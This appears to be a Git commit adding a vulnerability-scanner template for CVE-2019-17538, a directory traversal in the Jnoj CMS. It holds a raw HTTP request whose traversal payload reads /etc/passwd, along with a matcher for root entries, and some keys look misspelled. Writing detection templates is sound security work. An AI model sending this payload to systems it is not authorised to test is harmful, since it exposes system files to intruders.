Add files via upload

Jnoj Directory Traversal
patch-1
pussycat0x 2021-03-01 16:56:08 +05:30 committed by GitHub
parent 707a4de865
commit 780c343a95
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions

21
cves/CVE-2019-17538.yaml Normal file
View File

@ -0,0 +1,21 @@
id: CVE-2019-17538
info:
name: Jnoj Directory Traversal for file reading(LFI)
author: pussycat0x
severity: High
reference: https://github.com/shi-yang/jnoj/issues/53
tegs: cve.cve2019,jnoj,cms
requests:
- raw:
- |
GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
Content-Type: application/x-www-form-urlencoded
matchers-conditions: and
matchers:
- type : regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200